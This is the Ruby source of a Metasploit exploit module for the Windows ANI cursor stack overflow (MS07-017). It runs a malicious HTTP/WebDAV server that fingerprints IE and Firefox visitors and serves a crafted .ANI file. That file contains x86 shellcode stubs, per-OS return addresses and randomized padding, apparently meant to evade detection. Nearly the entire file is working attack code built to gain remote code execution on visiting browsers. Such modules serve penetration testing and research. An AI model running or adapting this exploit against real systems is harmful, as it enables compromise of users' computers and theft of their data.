## # $Id: ms07_017_ani_loadimage_chunksize.rb 9085 2010-04-15 16:08:27Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking # # This module acts as a HTTP server # include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) super(update_info(info, 'Name' => 'Windows ANI LoadAniIcon() Chunk Size Stack Overflow (HTTP)', 'Description' => %q{ This module exploits a buffer overflow vulnerability in the LoadAniIcon() function in USER32.dll. The flaw can be triggered through Internet Explorer 6 and 7 by using the CURSOR style sheet directive to load a malicious .ANI file. The module can also exploit Mozilla Firefox by using a UNC path in a moz-icon URL and serving the .ANI file over WebDAV. The vulnerable code in USER32.dll will catch any exceptions that occur while the invalid cursor is loaded, causing the exploit to silently fail when the wrong target has been chosen. This vulnerability was discovered by Alexander Sotirov of Determina and was rediscovered, in the wild, by McAfee. }, 'Author' => [ 'hdm', # First version 'skape', # Vista support # Firefox support, OS language independence, improved reliability 'Solar Eclipse ' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 9085 $', 'References' => [ ['CVE', '2007-0038'], ['OSVDB', '33629'], ['BID', '23194'], ['MSB', 'MS07-017'], ['URL', 'http://www.microsoft.com/technet/security/advisory/935423.mspx'], ['URL', 'http://www.determina.com/security.research/vulnerabilities/ani-header.html'], ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 1024 + (rand(1000)), 'Compat' => { 'ConnectionType' => '-find', } }, 'Platform' => 'win', # Automatic target tested on: # # Windows NT SP6 + IE6 SP1 # Windows 2000 SP4 + IE6 SP1 # Windows 2000 SP4 UR1 + IE6 SP1 # Windows XP SP0 # Windows XP SP1 # Windows XP SP2 # Windows XP SP2 + IE7 # Windows 2003 SP0 # Windows 2003 SP1 # Windows 2003 SP1 + IE7 # Windows Vista # # Windows XP SP0 + Firebird 0.7 # Windows XP SP0 + Firefox 1.0 # Windows XP SP0 + Firefox 1.5 # Windows XP SP2 + Firefox 2.0 # Windows 2003 SP1 + Firefox 2.0 # Windows Vista + Firefox 2.0 'Targets' => [ [ '(Automatic) IE6, IE7 and Firefox on Windows NT, 2000, XP, 2003 and Vista', { 'Method' => 'automatic' } ], [ 'IE6 on Windows NT, 2000, XP, 2003 (all languages)', { 'Method' => 'jmpesp', 'Ret1' => 0x0040afff, # jmp esp on NT, 2000, XP, 2003 SP0 (iexplore.exe) 'Ret2' => 0x004090df # jmp esp on 2003 SP1, SP2 (iexplore.exe) } ], [ 'IE7 on Windows XP SP2, 2003 SP1, SP2 (all languages)', { 'Method' => 'jmpesp', 'Ret1' => 0x00420B45, # jmp esp on XP SP2 (iexplore.exe) 'Ret2' => 0x00420B45 # jmp esp on 2003 SP1, SP2 (iexplore.exe) } ], [ 'IE7 and Firefox on Windows Vista (all languages)', { 'Method' => 'partial', 'Ret' => 0x700B # we change user32.dll+5879 to user32.dll+700B (jmp [ebx] in user32.dll) } ], [ 'Firefox on Windows XP (English)', { 'Method' => 'jmpesp', 'Ret1' => 0x77059E48, # jmp esp on XP (comres.dll) 'Ret2' => 0x77019668 # jmp esp on 2003 SP1, SP2 (comres.dll) } ], [ 'Firefox on Windows 2003 (English)', { 'Method' => 'jmpesp', 'Ret1' => 0x77019668, # jmp esp on 2003 SP0 (comres.dll) 'Ret2' => 0x77019668 # jmp esp on 2003 SP1, SP2 (comres.dll) } ], ], 'DisclosureDate' => 'Mar 28 2007', 'DefaultTarget' => 0)) register_options( [ OptPort.new('SRVPORT', [ true, "The daemon port to listen on", 80 ]), OptString.new('URIPATH', [ true, "The URI to use.", "/" ]) ], self.class) end # # Handle HTTP requests # def on_request_uri(cli, request) # # Automatic browser and OS detection # print_status("Attempting to exploit ani_loadimage_chunksize") browser = '' if target['Method'] == 'automatic' agent = request.headers['User-Agent'] # Check for Firefox requests if agent =~ /(Gecko|Microsoft-WebDAV-MiniRedir)/ browser = 'Mozilla' # WebDAV requires that we use port 80 and the URIPATH is '/' if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/' print_status("Mozilla request received from #{cli.peerhost}. To exploit Mozilla browsers, SRVPORT must be set to 80 and URIPATH must be '/'") cli.send_response(create_response(404, "File not found")) return end if agent =~ /(Windows NT 6\.0|MiniRedir\/6\.0)/ target = targets[3] # Firefox on Vista elsif agent =~ /(Windows NT 5\.1|MiniRedir\/5\.1)/ target = targets[4] # Firefox on XP elsif agent =~ /(Windows NT 5\.2|MiniRedir\/5\.2)/ target = targets[5] # Firefox on 2003 else print_status("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}") return end # Check for MSIE requests elsif agent =~ /MSIE/ browser = 'IE' if agent =~ /Windows NT 6\.0/ target = targets[3] # IE7 on Vista elsif agent =~ /MSIE 7\.0/ target = targets[2] # IE7 on XP and 2003 elsif agent =~ /MSIE 6\.0/ target = targets[1] # IE6 on NT, 2000, XP and 2003 else print_status("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}") return end # Unknown user agent else print_status("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}") return end end # # Find out if this is a request for an ANI file # # Mozilla always uses a .ani extension, but IE randomly picks one of the # other extensions for the ANI request exts = ['bmp', 'wav', 'png', 'zip', 'tar', 'ani'] ani_request = false match = /\.(...)$/.match(request.uri) if match and exts.include?(match[1]) ani_request = true end # # OPTIONS and PROPFIND requests sent by the WebDav Mini-Redirector # if request.method == 'OPTIONS' print_status("Received WebDAV OPTIONS request from #{cli.peerhost}:#{cli.peerport}") headers = { 'DASL' => '', 'DAV' => '1, 2', 'Public' => 'OPTIONS, GET, PROPFIND', 'Allow' => 'OPTIONS, GET, PROPFIND' } send_response(cli, '', headers) return end if request.method == 'PROPFIND' print_status("Received WebDAV PROPFIND request from #{cli.peerhost}:#{cli.peerport}") body = '' if (not ani_request) # Response for directories body = '' else # Response for files body = '' end send_response(cli, body, {'Content-Type' => 'text/xml'}) return end # # HTML requests sent by IE and Firefox # if (not ani_request) # Pick a random extension to use when we generate HTML. The moz-icon URL # must have a .ani extension, but we can use a random one for IE exts.delete('ani') ext = exts[rand(exts.length)] # Generate the HTML html = "" + "" + random_padding + "" + "" + random_padding + (browser == 'IE' ? generate_ie_html(ext) : generate_mozilla_html) + random_padding + "" + "" print_status("Sending HTML page to #{cli.peerhost}:#{cli.peerport}...") send_response(cli, html) return end # # ANI requests sent by IE and the WebDav Mini-Redirector # # Re-generate the payload return if ((p = regenerate_payload(cli)) == nil) print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") # Transmit the compressed response to the client send_response(cli, generate_ani(p, target), { 'Content-Type' => 'application/octet-stream' }) end # # Generate a
element with a style attribute referencing the ANI file # def generate_ie_html(ext) path = get_resource.sub(/\/$/, '') "
" + random_padding + "
" end # # Generate a img tag with a moz-icon URL referencing the ANI file # def generate_mozilla_html path = get_resource.gsub(/\/$/, '') # The UNC path of the ANI file must have at least one directory level, # otherwise the WebDAV redirector will not work if path == '' path = '/' + rand_text_alphanumeric(rand(80)+16) end return '' end # # Generate CSS padding # def random_css_padding buf = random_whitespace + "/*" + random_whitespace + random_padding + random_whitespace + "*/" + random_whitespace end # # Generate random whitespace # def random_whitespace len = rand(100)+2 set = "\x09\x20\x0d\x0a" buf = '' while (buf.length < len) buf << set[rand(set.length)].chr end buf end # # Generate random padding # def random_padding rand_text_alphanumeric(rand(128)+4) end # # Generate an ANI file that will trigger the vulnerability # def generate_ani(payload, target) # Valid ANI header header = [ 36, # cbSizeOf (must be 36) rand(128)+16, # cFrames (must be > 1 and < 0x10000) rand(1024)+1, # cSteps (must be < 0x10000) 0, 0, # cx, cy 0, # cBitCount 0, # cPlanes 0, # JifRate 1 # Flags (must have the LSB bit set) ].pack('V9') overflow = '' if target['Method'] == 'jmpesp' # ANI header that triggers the overflow: overflow = # 36 bytes of fake header # When we get control, the ebx and esi registers have the following values: # # 2000, XP, 2003 before MS05-002 # ebx = 0, esi = pointer to MappedFile struct # # NT before MS05-002 # ebx = pointer to dword 1, esi = pointer to MappedFile struct # # all versions after MS05-002, including XP SP2 and 2003 SP1 # ebx = pointer to MappedFile struct # # The first field in MappedFile is a pointer to the ANI file "\x85\xDB" + # test ebx,ebx "\x74\x0A" + # jz jmp_esi 2000, XP, 2003 before MS05-002 "\x81\x3B\x01\x00\x00\x00" + # cmp dword [ebx], 0x1 "\x74\x02" + # jz jmp_esi NT before MS05-002 "\x89\xDE" + # mov esi, ebx all versions after MS05-002 # jmp_esi: "\x8B\x36" + # mov esi,[esi] pointer to ANI file "\x81\x3E\x52\x49\x46\x46" + # cmp [esi], 'RIFF' "\x75\x02" + # jnz failed "\xFF\xE6" + # jmp esi # failed: "\x31\xc0" + # xor eax, eax "\x8b\x00" + # mov eax, [0] exit via SEH rand_text(2) + "\x00\x00\x00\x00" + # header flags (LSB bit must be set to 0) # end of header rand_text(4*6) + # local variables # The following local variables must be NULL to avoid calls to # HeapFree and NtUserDestroyCursor # 2000, XP, 2003 SP0 2003 SP1 "\x00\x00\x00\x00" + # var_10 "\x00\x00\x00\x00" + # var_C "\x00\x00\x00\x00" + # var_C "\x00\x00\x00\x00" + # var_8 "\x00\x00\x00\x00" + # var_4 [ target['Ret1'], # return address for NT, 2000, XP and 2003 SP0 target['Ret2'] # return address for 2003 SP1 ].pack('VV') + rand_text(4*4) + # function arguments "\x90\x90\x90\x90" + # jmp esp on NT, 2000, XP and 2003 SP0 lands # here, 2003 SP1 lands on the next dword "\xeb\x92" # jump back to the shellcode in the ANI header elsif target['Method'] == 'partial' # ANI header that triggers the overflow: overflow = # 36 bytes of fake header rand_text(32) + "\x00\x00\x00\x00" + # header flags (LSB bit must be set to 0) # end of header rand_text(4*8) + # local variables # The following local variables must be NULL to avoid calls to # HeapFree and NtUserDestroyCursor on Vista "\x00\x00\x00\x00" + # var_C "\x00\x00\x00\x00" + # var_8 "\x00\x00\x00\x00" + # var_4 rand_text(4) + # saved ebp [ target['Ret'], # 2 byte partial overwrite of the return address ].pack('v') else raise "Unknown target #{targetr['Method']}" end # Build the ANI file # The shellcode execution begins at the RIFF signature: # # 'R' 52 push edx # 'I' 49 dec ecx # 'F' 46 inc esi # 'F' 46 inc esi # eb 3a jmp +3a # jmp to the code in the payload chunk ani = "RIFF" + "\xeb\x3a\x00\x00" + "ACON" + riff_chunk("anih", header) + # payload chunk riff_chunk(random_riff_tag, Rex::Arch::X86.copy_to_stack(payload.encoded.length) + payload.encoded) + random_riff_chunks + # the second anih chunk trigger the overflow riff_chunk("anih", overflow) + random_riff_chunks return ani end # # Builds a RIFF chunk with a specified tag and data # def riff_chunk(tag, data) len = data.length padding = len % 2 # RIFF chunks must be 2 byte aligned return tag + [len].pack('V') + data + ("\x00" * padding) end # # Generates a random number of random RIFF chunks, up to 4352 bytes # def random_riff_chunks(count = rand(16) + 17) chunks = '' 0.upto(count) do chunks << random_riff_chunk() end return chunks end # # Generates a random RIFF chunk, up to 136 bytes # def random_riff_chunk(len = rand(128) + 1) riff_chunk(random_riff_tag, rand_text(len)) end # # Generates a random RIFF tag, making sure that it's not one of the # tags processed by LoadAniIcon or LoadCursorIconFromFileMap # def random_riff_tag valid = ['RIFF', 'ACON', 'anih', 'LIST', 'fram', 'icon', 'rate'] tag = nil begin tag = rand_text_alpha(4) end while valid.include? tag return tag end end